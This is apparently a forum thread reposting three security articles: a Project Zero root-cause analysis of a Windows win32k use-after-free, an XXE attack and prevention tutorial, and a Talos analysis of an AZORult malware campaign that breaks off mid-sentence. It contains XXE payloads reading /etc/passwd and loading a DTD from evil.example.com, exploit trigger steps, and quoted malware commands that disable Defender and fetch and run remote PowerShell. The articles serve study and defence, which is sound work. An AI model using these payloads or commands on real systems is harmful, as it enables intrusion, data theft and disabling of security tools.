xxxNextWindow lock the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow then uses the pointer to the tagQ object without any verification, causing a use-after free. DETAILED WALK THROUGH This section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section. The Windows 7 crash POC that I developed is available here. ANALYZED SAMPLES I did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the “My Process” section. Vulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256) Patched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256) OVERVIEW This walk through is broken up into the following sections to describe the vulnerability: Triggering xxxNextWindow Freeing the tagQ (queue) structure User-mode callback xxxMoveSwitchWndHilite Using the freed queue TRIGGERING xxxNextWindow The code path is triggered by a special set of keyboard inputs to open a “Sticky Task Switcher” window. As a side note, I didn’t find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API: <ALT (Extended)> + TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See triggerNextWindow function in POC). The “normal” way to trigger the task switch window is with ALT + TAB, or ALT+CTRL+TAB for “sticky”. However, this window won’t hit the vulnerable code path, xxxNextWindow. The “normal” task switching window, shown below, looks different from the task switching window displayed when the vulnerable code path is being executed. Shown below is the “normal” task switch window that is displayed when ALT+TAB [+CTRL] are pressed and xxxNextWindow is NOT triggered. The window that is shown when xxxNextWindow is triggered is shown below that. "Normal" task switch window Window that is displayed when xxxNextWindow is called If this is the first “tab press” then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The next time you hit TAB, after the window has already been drawn on the screen, when the rectangle should move to the next window, is when the vulnerable code in xxxNextWindow can be reached. FREEING THE QUEUE in xxxNextWindow xxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function. At LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-callback mode is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window. void __fastcall xxxNextWindow(tagQ *queue, int a2) { [...] V43 = 0; while ( 1 ) { if (gspwndAltTab->fnid & 0x3FFF == 0x2A0 && gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] && gspwndAltTab->bDestroyed == 0 ) v45 = *(switchWndStruct **)(gspwndAltTab + 0x128); else v45 = 0i64; if ( !v45 ) { ThreadUnlock1(); goto LABEL_106; } handleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2); ← USER MODE CALLBACK if ( v43 ) { if ( v43 == handleOfNextWindowToHilite ) { v48 = 0i64; LABEL_103: ThreadUnlock1(); HMAssignmentLock(&gspwndActivate, v48); if ( !*(_QWORD *)&gspwndActivate ) xxxCancelCoolSwitch(); return; } } else { v43 = handleOfNextWindowToHilite; } tagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW); if ( tagWndPtrOfNextWindow ) goto LABEL_103; isShiftPressed2 = isShiftPressed; } [...] LABEL_106: v11 = queue->spwndActive; ← USE AFTER FREE if ( v11 || (v11 = queue->ptiKeyboard->rpdesk->pDeskInfo->spwnd->spwndChild) != 0i64 ) { [...] USER-MODE CALLBACK in xxxMoveSwitchWndHilite There are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite. This call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback. xxxMoveSwitchWndHilite sends message 0x8C which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it’s not expected that user applications will respond to this message. Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, in the POC we hot-patch the PEB.KernelCallbackTable, using the methodology documented here. In the callback, we free the tagQ structure using AttachThreadInput. AttachThreadInput “attaches the input processing mechanism of one thread to that of another thread” and to do this, it destroys the queue of the thread that is being attached to another thread’s input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now freed queue: xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we’ll loop back to the top of the while loop. Once we’re back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go in the else block or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn’t work because this window is a special system class (fnid == 0x2A0). Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue. if (gspwndAltTab->fnid & 0x3FFF == 0x2A0 && gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] && gspwndAltTab->bDestroyed == 0 ) v45 = *(switchWndStruct **)(gspwndAltTab + 0x128); else v45 = 0i64; USING THE FREED QUEUE Once v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer so we dereference it and move it into r14. Therefore we now have a use-after-free. WINDOWS 10 CVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903. Vulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256) Patched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256) I confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. Below are excerpts from the crash. ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. FAULTING_IP: win32kfull!xxxNextWindow+743 ffff89ba`965f553b 4d8bbd80000000 mov r15,qword ptr [r13+80h] # Child-SP RetAddr Call Site 00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus 01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12 02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952 03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107 04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933 05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f 06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360 07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743 ← UAF 08 ffffa003`81fe6d30 ffff89ba`96b9939f win32kfull!EditionHandleAndPostKeyEvent+0xab005 09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b 0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5 0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5 0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab 0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4 0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3 0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d 10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25 11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14 12 0000002b`2a5ffbb0 00007ffb`7f487bd4 WizardOpium+0x1335 <- My POC 13 0000002b2a5ffc10 00007ffb7f86ced1 KERNEL32!BaseThreadInitThunk+0x14 14 0000002b2a5ffc40 0000000000000000 ntdll!RtlUserThreadStart+0x21 BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202 To trigger the crash, I only had to change two things in the Windows 7 POC: The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch Window). It is possible to do this programmatically, I just didn’t take the time to code it up. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable. It took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run). Disassembly at xxxNextWindow+737 in Oct 2019 Update Disassembly at xxxNextWindow+73F in Nov 2019 Update The fix in the November update for Windows 10 1903 is the same as the Windows 7 fix: Add the UnlockQueue function. Add locking around the call to xxxNextWindow. Check the “destroyed” bitflag in the tagQ struct before proceeding to use the queue. FIXING THE VULNERABILITY To patch the CVE-2019-1433 vulnerability, Microsoft changed four functions: xxxNextWindow xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) zzzDestroyQueue UnlockQueue (new function) Overall, the changes are to prevent the queue structure from being freed and track if something attempted to destroy the queue. The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects. zzzDestroyQueue Patch The only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags. zzzDestroyQueue Pre-Patch zzzDestroyQueue Post-Patch xxxNextWindow Patch There is a single change to the xxxNextWindow function as shown by the BinDiff graph below. When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added to xxxNextWindow+0x847 are as follows where rbp is the pointer to the tagQ structure. bt dword ptr [rbp+13Ch], 1Ah jb loc_FFFFF9600017A0C9 If the bit is set, the function exists. If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed, but couldn't be freed immediately because its refcount (tagQ.cLockCount) is greater than 0. Setting the bit is a new change to the code base as described in the section above. xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch In this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10. The change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn’t appear to be publicly documented by Microsoft. My understanding comes from Tarjei Mandt’s 2011 Blackhat USA presentation, “Kernel Attacks through User-Mode Callbacks”. Thread locking is where objects are added to a thread’s lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread. The new function, UnlockQueue, is used to unlock the queue. if ( !queue ) queue = gptiRit->pq; xxxNextWindow(queue, vkey_cp); xxxKeyEvent+92E Pre-Patch if ( !queue ) queue = gptiRit->pq; ++queue->cLockCount; currWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62); threadLockW32 = currWin32Thread->ptlW32; currWin32Thread->ptlW32 = (_TL *)&threadLockW32; queueCp = queue; unlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue; xxxNextWindow(queue, vkey_cp); currWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64); currWin32Thread2->ptlW32 = threadLockW32; unlockQueueFnPtr(queueCp); xxxKeyEvent+94E Post-Patch CONCLUSION So...I got it wrong. Based on the details provided by Kaspersky in their blog post, I attempted to patch diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method, that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl here. If I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn’t have analyzed the wrong bug. This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn’t get updates every single month. Now I know to not only rely on Windows Update, but also to look for KB articles and that I can download additional updates from the Microsoft Update Catalog. Although this blog post didn’t turn out how I originally planned, I decided to share it in the hopes that it’d encourage others to explore a platform new to them. It’s often not a straight path, but if you’re interested in Windows kernel research, this is how I got started. In addition, I think this was a fun and quite interesting bug! I didn’t initially set out to do a patch diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing, but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit. Therefore, I think that three weeks can be used as an approximate high upper bound since most attackers looking to use this technique will have more experience. Posted by Tim at 9:32 AM Sursa: https://googleprojectzero.blogspot.com/2020/04/tfw-you-get-really-excited-you-patch.html
-
XML External Entity (XXE) Attacks and How to Avoid Them Category: Web Security Readings - Last Updated: Fri, 03 Apr 2020 - by Zbigniew Banach XXE injection attacks exploit support for XML external entities and are used against web applications that process XML inputs. Attackers can supply XML files with specially crafted DOCTYPE definitions to an XML parser with a weak security configuration to perform path traversal, port scanning, and numerous attacks, including denial of service, server-side request forgery (SSRF), or even remote code execution. Let’s see how XXE injection attacks work, why they are possible, and what you can do to prevent them. How XML Entities Work We’re all familiar with HTML entities corresponding to special characters, such as or ™. In XML documents, new entities can be defined in the DOCTYPE declaration and can contain a wide variety of values, similar to macro definitions in many programming languages. For example: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY bar "World"> ]> <foo>Hello &bar;</foo> In this XML document type, the entity &bar; corresponds to the string World, so the last line simply gives the output Hello World. Crucially for XXE attacks, entity values don’t have to be defined in the document itself, but can also be loaded from external sources, including local files (local from the perspective of the machine where the parser is executed) and URIs. This allows documents to define and reference XML external entities, for example: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///home/myuser/world.txt"> ]> <foo>Hello &xxe;</foo> Assuming the file /home/myuser/world.txt exists and contains the string World, this example will give the same output. XXE Injection Attacks External entities are inherently unsafe because XML processors were not designed to check content, so the resolved entity could contain anything. Combined with the complexity of rarely-used DTD constructs, this provides attackers with many attack vectors. Resource Exhaustion Attacks Even though it doesn’t use external entities, we have to start with the simplest XML-based denial of service attack, known as the Billion Laughs Attack or XML bomb. It relies on combining multiple XML entities that reference each other, for example: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE bomb [ <!ELEMENT bomb ANY> <!ENTITY fun "haha"> <!ENTITY fun1 "&fun;&fun;&fun;&fun;&fun;&fun;&fun;&fun;"> <!ENTITY fun2 "&fun1;&fun1;&fun1;&fun1;&fun1;&fun1;&fun1;&fun1;"> <!ENTITY fun3 "&fun2;&fun2;&fun2;&fun2;&fun2;&fun2;&fun2;&fun2;"> <!-- repeat many more times --> ]> <bomb>&fun3;</bomb> As the XML parser expands each entity, it creates new instances of the first entity at an exponential rate. Even in this short example, the string haha would be generated 83 = 512 times. If parser resources are not capped, this type of attack can quickly exhaust server memory by creating billions of entity instances. (The first published example used the string lol, hence the name “Billion Laughs”.) Another way to achieve resource exhaustion is to inject an external entity that references an endless stream of data, such as /dev/urandom on Linux systems. Note the use of the SYSTEM identifier to specify an external entity: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///dev/urandom"> ]> <foo>&xxe;</foo> Again, if uncapped, the XML parser could lock up the server by exhausting its memory to store the never-ending data. Apart from resource capping, parsers can be protected from such attacks by enabling lazy expansion to only expand entities when they are actually used. Data Extraction Attacks External entities can reference URIs to retrieve content from local files or network resources. By referencing a known (or likely) filename on the local system, an attacker can gain access to local resources, such as configuration files or other sensitive data: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo> On a Linux system, this would return the content of the password file. For Windows, you could reference file:///c:/boot.ini or another common system file. Relative paths can also be used. The same approach can be used to retrieve remote content from the local network, even from hosts that are not directly accessible to the attacker. This example attempts to retrieve the file mypasswords.txt from the host at IP 192.168.0.1: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "http://192.168.0.1/mypasswords.txt"> ]> <foo>&xxe;</foo> SSRF Attacks By exploiting an XXE vulnerability, attackers can gain indirect access to an internal network and launch attacks that appear to originate from a trusted internal server. Here’s an example of server-side request forgery using an XXE payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "http://internal-system.example.com/"> ]> <foo>&xxe;</foo> If executed on a web server, this could allow the attacker to send HTTP requests to an internal system, providing a foothold for further attacks. Advanced XXE Injection Using Parameter Entities More advanced XXE attacks often make use of DTD parameter entities. These are very similar to regular (general) entities but can only be referenced within the DTD itself. Here’s a simple example that uses a parameter entity to define a regular entity (note the % character used to define and then reference a parameter entity): <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY % parameterEnt "<!ENTITY generalEnt 'Bar'>" > %parameterEnt; ]> <foo>Hello &generalEnt;</foo> In this case, parameterEnt is replaced by the internal string with a regular entity definition, so the example returns Hello Bar. Attackers can use this functionality to inject external DTD files containing more parameter entities. For example, it can be useful to wrap exfiltrated data in CDATA tags so the parser doesn’t attempt to process it. The attacker can start by placing the following paramInjection.dtd file on their server: <!ENTITY % targetFile SYSTEM "file:///etc/passwd"> <!ENTITY % start "<![CDATA["> <!ENTITY % end "]]>"> <!ENTITY % everything "<!ENTITY wrappedFile '%start;%targetFile; %end;'>"> The actual attack is then conducted using the following XML document: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY % externalDTD SYSTEM "http://evil.example.com/paramInjection.dtd"> %externalDTD; %everything; ]> <foo>&wrappedFile;</foo> The parser loads the external DTD and then defines the internal entity wrappedFile that wraps the target file in a CDATA tag. Preventing XML External Entity Attacks XXE vulnerabilities first appeared on the OWASP Top 10 in 2017 and went straight in at #4. This class of vulnerabilities is also listed in the CWE database as CWE-611: Improper Restriction of XML External Entity Reference. Successful exploitation can not only affect application availability but also open the way to a wide variety of attacks and data exfiltration vectors, so preventing XXE attacks is crucial for web application security. XML external entity attacks rely on legacy support for Document Type Definitions, which are the oldest type of document definition, dating back to SGML. This means that disabling DTD support is the best way of eliminating XXE vulnerabilities. If that’s not possible, you can disable just the external entity support – in PHP, for example, this is done by setting libxml_disable_entity_loader(true). See the OWASP XML External Entity Prevention cheat sheet for a detailed discussion of XXE prevention methods for various parsers. To check your web applications for XXE vulnerabilities, use a reliable and accurate web application scanner. Netsparker detects XXE vulnerabilities, including out-of-band XXE, and flags them as high-severity. Sursa: https://www.netsparker.com/blog/web-security/xxe-xml-external-entity-attacks/
-
Thursday, April 2, 2020 AZORult brings friends to the party By Vanja Svajcer. NEWS SUMMARY We are used to ransomware attacks and big game hunting making the headlines, but there is an undercurrent of other attack types that allow attackers to monetize their efforts in a less intrusive way. Here, we discuss a multi-pronged cyber criminal attack using a number of techniques that should alert blue team members with appropriate monitoring capability but are not immediately obvious to end-users. These threats demonstrate several techniques of the MITRE ATT&CK framework, most notably T1089 (Disabling Security Tools), T1105 (Remote File Copy), T1027 (Obfuscated Files or Information), T1086 (PowerShell), T1202 (Indirect Command Execution), T1055 (Process Injection), T1064 (Scripting), T1053 (Scheduled Task) and T1011 (Exfiltration Over Other Network Medium) Attackers are constantly reinventing ways of monetizing their tools. Cisco Talos recently discovered a complex campaign with several different executable payloads, all focused on providing financial benefits for the attacker in a slightly different way. The first payload is a Monero cryptocurrency miner based on XMRigCC, and the second is a trojan that monitors the clipboard and replaces its content. There's also a variant of the infamous AZORult information-stealing malware, a variant of Remcos remote access tool and, finally, the DarkVNC backdoor trojan. What's new? Embedding an executable downloader in an ISO image file is a relatively new method of delivery for AZORult. It's also unusual to see attackers using multiple methods to make money. How did it work? The infection chain starts with a ZIP file, which contains an ISO disk image file. When the user opens the ISO file, a disk image containing an executable loader is mounted. When the loader is launched, it deobfuscates malicious code which downloads the first obfuscated PowerShell loader stage that kickstarts the overall infection, disables security tools and Windows update service and downloads and launches the payloads. So what? Defenders need to be constantly vigilant and monitor the behavior of systems within their network. Attackers are like water — they will attempt to find the smallest crack to achieve their goals. While organizations need to be focused on protecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their infrastructure. Technical case overview Introduction The initial trigger for this investigation was a telemetry entry that showed a PowerShell process launching a download and executing a PowerShell loader. After the drill-down, the telemetry shows that the PowerShell downloading code was launched by an executable dropper included in an ISO image that's mounted within the operating system by the user. The ISO image seems to have been downloaded compressed with ZIP, possibly encrypted with a password, which indicates it's primarily spread via email. Executable dropper with anti-sandboxing The dropper's functionality is rather simple, but the code contains some interesting features. All malicious API calls are resolved dynamically but locating the PEB and traversing one of the lists of loaded modules in memory to find the module address. From there, the downloader goes through the export table in order to find and return the address of the required functions which is then indirectly called using one of the 'call reg' instructions. All strings, including the entire command line for the downloader PowerShell code are encrypted with a static byte key, different for each string, which also gets decrypted during the execution. Command-line for the PowerShell downloader is deobfuscated using a byte XOR key. The most interesting feature is the function that randomly calls APIs from the lists twice. First, two randomly generated numbers from 0 to 9 are generated by a pseudo-random number generator and those numbers — m and n are used as parameters for the function. Random API calls function The function first randomly chooses and calls m and then n APIs from the list: GetCommandLineA GetTickCount GetLastError GetSystemDefaultLangID GetCurrentProcess GetProcessHeap GetEnvironmentStrings This is likely done to confuse behavioral detectors, emulators and sandboxes which may base their detections on sequences of executed API calls. The downloader eventually calls the MessageBox API to display a fake error message. Executable downloader fake error message. First stage PowerShell loader The first stage of the PowerShell loader is a simple command line: When the base64 command-line option is decoded, we reach the actual downloading code which uses githubusercontent.com to first disable Windows Defender, stop Windows update, download and execute the next malware stage using the Invoke-Expression cmdlet. Set-MpPreference -DisableRealtimeMonitoring $true cmd /c reg add 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f cmd /c sc stop wuauserv\r\ncmd /c sc config wuauserv start= disabled iex ((New-Object System.Net.WebClient).DownloadString('hxxps://gist[.]githubusercontent[.]com/mysslacc/a5b184d9d002bf04007c4bbd2a53eeea/raw/c6f8b4c36e48425507271962855f3e2ac695f99f/baseba')) The downloaded PowerShell script is first base64-decoded and decrypted using the cmdlet ConvertTo-SecureString. The result is an obfuscated PowerShell script with several layers of obfuscation, a result of applying the Invoke-Obfuscation method to the initial code. Once deobfuscated, we can see the functionality of the PowerShell loader. PowerShell loader The PowerShell script downloaded and executed by the executable downloader is responsible for the installation of payloads and ensuring that they stay persistent after user logs out. All the payloads are downloaded from external sites. The loader first sets the PowerShell preferences so that the warning and error messages are not displayed and so that the script continues executing if an error is encountered. $WarningPreference = "SilentlyContinue" $erroractionpreference = "SilentlyContinue" The execution continues with checking the current privileges. The loader behaves differently if the user has administrative privileges. If the user does not have administrative privileges, the loader creates the registry value HKCU\Software\Kumi and stores a base64 encoded string that contains code to download and execute a variant of XMRigCC cryptocurrency miner. It then creates a scheduled task with the name OneDrive SyncTask to execute hourly and launch the miner which is read from the previously created registry entry. If the user belongs to the administrators' group, the loader will first create exclusion folders for the Windows Defender so that certain folders are not scanned and then attempt to disable various Defender's user notifications so that the user is not notified if any of the components in the attack are detected. Malwarebytes anti-malware service will also be stopped and deleted if it exists on the computer. Finally, if the loader has administrative privileges it will attempt to create three services WinDefends, thundersec and WindowsNetworkSVC, and create three scheduled tasks to launch those services on an hourly basis. The task names are \Microsoft\Windows\Shell\updshell, \Microsoft\Windows\Autochk\SystemProxy and \Microsoft\Windows\MobilePC\DetectPC. At the time of writing, the first URL contained a loader for either a variant of Remcos remote access tool or a variant of DarkVNC remote access trojan. If the user has administrative privileges, the loader launches Remcos. Otherwise, it launches DarkVNC. The loader then downloads and launches a clipboard modification trojan from githubusercontent.com with the filename clp.exe in the user's temporary folder. This cryptocurrency stealer is described later. Regardless of the permissions, the loader will create a registry value HKCU\Software\cr\d and store the code to download and launch one of the above backdoor trojans and creates a scheduled task "Update Shell" to run every five hours. The task retrieves the value stored as a base64 encoded string in the registry and downloads code from the URL hxxps://raw[.]githubusercontent[.]com/mysslacc/thd/master/base. Finally, the loader uses a process injector RunPE to inject a variant of the Azorult information-stealing trojan into the notepad.exe process. Process tree of the PowerShell loader as seen in Cisco Threat Grid Payloads XMRigCC cryptominer Perhaps the least interesting payload installed by the loader, XMRigCC is a variant of an open-source miner that can be controlled through a command and control (C2) console. XMRigCC has its own loader, which is called by decoding and executing the content of the variable $kumi of the main loader. The particular payload is not configured to connect to a command and control server but chooses its pool host from a list of the following URLs. All connections are conducted over port 443, possibly to avoid easy detections when other ports are used. The list of hosts from the configuration is: eu[.]minerpool[.]pw 185[.]10[.]68[.]220 rig[.]zxcvb[.]pw rig[.]myrms[.]pw back123[.]brasilia[.]me rs[.]fym5gserobhh[.]pw Cisco Umbrella showing a spike of DNS requests for eu[.]minerpool[.]pw. The cryptominer installs itself depending on the loader's process privileges. If the PowerShell loader has administrative privileges, it will attempt to disable Windows Defender, Malwarebytes, Sophos and HitMan Pro if they are installed. The loader then downloads the payload from the IP address 195.123.234.33, and copies it into C:\ProgramData\Oracle\Java\java.exe. One of the interesting features is the download of a third-party driver, WinSys0 from the OpenLibSys utility, which allows the client application to read and write physical memory. However, it seems that the driver is not used and there is no evidence of the driver being loaded into memory. The loader creates the following scheduled tasks: \Microsoft\Windows\Bluetooth\UpdateDeviceTask \Microsoft\Windows\Shell\WindowsShellUpdate \Microsoft\Windows\Shell\WinShell \Microsoft\Windows\UPnP\UPnPHost \Microsoft\Windows\UPnP\UPnPClient Task \Microsoft\Windows\SMB\SMB Task \Microsoft\Windows\EDP\EDP App Lock Task \Microsoft\Windows\EDP\EDP App Update Cache \Microsoft\Windows\MobilePC\DetectPC \Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization \Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678155-433529325-2142214968-1138 and creates one of the two services, depending on the bitness of the operating system: cli_optimization_v2.0.55727_64 cli_optimization_v2.0.55727_32 The services simply call mshta.exe to download an HTML application that downloads and runs the same cryptominer loader. The loader downloads and runs a PowerShell script del.ps1 that disables Windows event logging and attempts to terminate system utilities such as Process Explorer, Task Manager, Process Monitor and Daphne Task Manager. The non-administrative branch of the cryptominer loader is quite similar and takes into account that changes are made to objects that can be modified by the current user. Here is the list of new scheduled task names created by the lower-privilege branch of the loader: OneDrive Sync OneDrive SyncTask Optimization .NET Optimize Start Menu Cache Files-S-3-5-21-2236678155-433519125-1142214968-1037 Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137 Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1138 Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1337 Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1447 Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142314968-1037 \Microsoft\Windows\Optimization Clipboard cryptocurrency stealer The next payload is a cryptocurrency clipboard-stealing trojan. The main loader downloads it from hxxps://gist[.]githubusercontent[.]com/mysslacc/ee6d2b99f8e3a3475b7a36d9e96d1c18/raw/1a82b38931d8421406f53eb8fc4c771127b27ce4/clp, saves it in the user's temporary folder as "clp.exe," which is then launched. The trojan copies itself into the file updip.exe in the user's ProgramData\updip folder and creates a link file udpid.lnk in the user's Startup folder so that the malware runs every time the user logs into the system. The link file is created by a PowerShell process that is called directly by the trojan with a long command line containing a base64-encoded script. The persistence is also ensured by creating a new scheduled task — GoogleChromeUpdateTask — which runs the trojan every three hours. Apart from the installation and persistence, the main functionality of the trojan is contained in a simple loop that monitors the clipboard content every half a second. The trojan contains an obfuscated list of regular expressions used to match the clipboard content. The strings are stored either as a data buffer or as constants assigned to contiguous memory locations. Once a buffer is created, its contents are XORd with the byte key 0x2e. Deobfuscating a regex to match Bitcoin addresses. Here, we see that the trojan initialises a memory buffer with the value 70751f1d73754f03454303546f03666403607e03741e031773551c18021d1d53, which after XOR, reveals a regular expression #^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$, apparently used to match Bitcoin addresses. If a Bitcoin address is matched, the malware calls the routine to modify the clipboard, presumably to redirect any transactions to the address owned by the attacker. Decrypting attacker's Bitcoin wallet address to replace the clipboard data. Based on the arguments of the function, the trojan will choose one of the attacker-owned cryptocurrency addresses and modify the clipboard to contain the deobfuscated data. Once again, we see here that the buffer is filled with the value 1d6d5d4a17745f1a5c1f184a787f5b7c6b5d1b1c571b4b646849776b5f7f446f561f, which becomes the address 3Csd9Zq4r16dVQuREs52y5eJFgYEqQjAx1 after deobfuscation. We can easily see that this address earned just a bit under six Bitcoins over time. The number of transactions and the amount earned by the clipboard stealer in Bitcoins. The trojan targets 